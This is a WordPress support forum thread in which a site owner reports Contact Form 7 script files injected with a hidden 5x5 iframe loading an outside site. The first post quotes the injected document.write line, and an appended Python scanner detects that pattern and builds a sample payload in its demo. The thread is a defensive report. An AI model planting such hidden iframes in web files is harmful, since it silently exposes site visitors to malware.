• vaschops

    (@vaschops)


    Hi..

    I am having repeated issues on multiple websites that I use CF7 with malware attached to some scripts…identified as code injection by webmaster tools…
    The websites are being ‘blocked’ by Google…and the browser…landing on a message page instead of the URL homepage…saying “The Website Ahead Contains Malware!”.

    The url of the malware is like this:
    https://…/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1

    The code inserted is:

    document.write('<iframe src="https://jnvzpp.sellClassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

    I tried removing the iframe that appears inserted at the bottom of all of the scripts in the JS folder of CF7…manually…but I don't yet know if they will be regenerated by another kind of script.

    From forums I read there is a security breach to a lot of sites through CF7.
    Some quoted that by removing the plugin removed the problem as well.
    I will have to do the same if there is no action addressed to this security problem.

    Could someone from the developers comment on this?

    Or…if anyone else who has resolved this issue…could shed some light on this troubling case.

    Thank you for a great plugin…We ought to keep it that way.

    .v.

    https://www.ads-software.com/extend/plugins/contact-form-7/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Takayuki Miyoshi

    (@takayukister)

    Where is the site? When did you realize the issue first?

    Thread Starter vaschops

    (@vaschops)

    Hi again…

    I have to say that the problem goes further than CF7.
    Yesterday I cleaned the injected code from JS files of CF7…
    …and today I had new injected codes in Shortcodes Ultimate JS files.
    I also installed a plugin, Simple Login Log…to help me find out if there is any hidden user trying to log in…and there was one failed attempt as ‘admin’…(there is no registered user like that)

    So…I don't know how these breaches occur.

    The site is https://www.eloundaisland.gr

    Now…if the same security issues occur for all plugins that use JS files…I'm not sure…

    Please comment if you know…or can see something I don't…

    Thanks for your quick reply.

    Plugin Author Takayuki Miyoshi

    (@takayukister)

    Take the steps written in the FAQ “My site was hacked”. Then if you find the cause, please report it here.
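
The injection pattern reported in this thread (a `document.write` of a 5×5 iframe appended to the bottom of plugin JS files) can be searched for across a whole plugins directory. The following Python scan is an added example, not part of any post and not code from the plugin; the function names, the 10-pixel threshold and the `malicious.example` host are assumptions chosen for illustration.

```python
import re
import tempfile
from pathlib import Path

# document.write('<iframe ...>...</iframe>') with a quoted string argument
DOCWRITE_IFRAME = re.compile(
    r"document\.write\(\s*(['\"])(?P<html>\s*<iframe\b.*?</iframe>\s*)\1\s*\)",
    re.IGNORECASE | re.DOTALL)
ATTR = re.compile(r"([\w-]+)\s*=\s*\"([^\"]*)\"")

def parse_attrs(html):
    # Drop whitespace inside values: the payload may be wrapped across lines
    return {k.lower(): re.sub(r"\s+", "", v) for k, v in ATTR.findall(html)}

def is_tiny(attrs, max_px=10):
    # True only when width and height are both present and at most max_px
    dims = [re.fullmatch(r"(\d+)(?:px)?", attrs.get(n, "")) for n in ("width", "height")]
    return all(dims) and all(int(d.group(1)) <= max_px for d in dims)

def scan_js(text):
    # One finding per document.write(<iframe>) call; at_end marks appended code
    findings = []
    for m in DOCWRITE_IFRAME.finditer(text):
        attrs = parse_attrs(m.group("html"))
        findings.append({"src": attrs.get("src", ""), "tiny": is_tiny(attrs),
                         "at_end": text[m.end():].strip(" \t\r\n;") == ""})
    return findings

def scan_tree(root):
    # Scan every .js file under root; map relative path -> list of findings
    hits = {}
    for path in sorted(Path(root).rglob("*.js")):
        found = scan_js(path.read_text(errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def demo():
    # Constructed sample tree: one clean script, one with an appended iframe
    payload = ('document.write(\'<iframe src="https://malicious.example/x.cgi?8" '
               'frameborder="no" height="5" width="5"></iframe>\');')
    with tempfile.TemporaryDirectory() as tmp:
        js = Path(tmp, "plugins", "some-plugin", "js")
        js.mkdir(parents=True)
        (js / "clean.js").write_text("function f(){ return 1; }\n")
        (js / "scripts.js").write_text("function g(){ return 2; }\n" + payload + "\n")
        return scan_tree(tmp)

if __name__ == "__main__":
    print(demo())
```

A pattern scan finds only this payload shape; comparing each plugin file against a fresh download of the same plugin version catches any modification, including ones written back after a manual cleanup.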

  • The topic ‘Contact Form 7 malware attached to scripts’ is closed to new replies.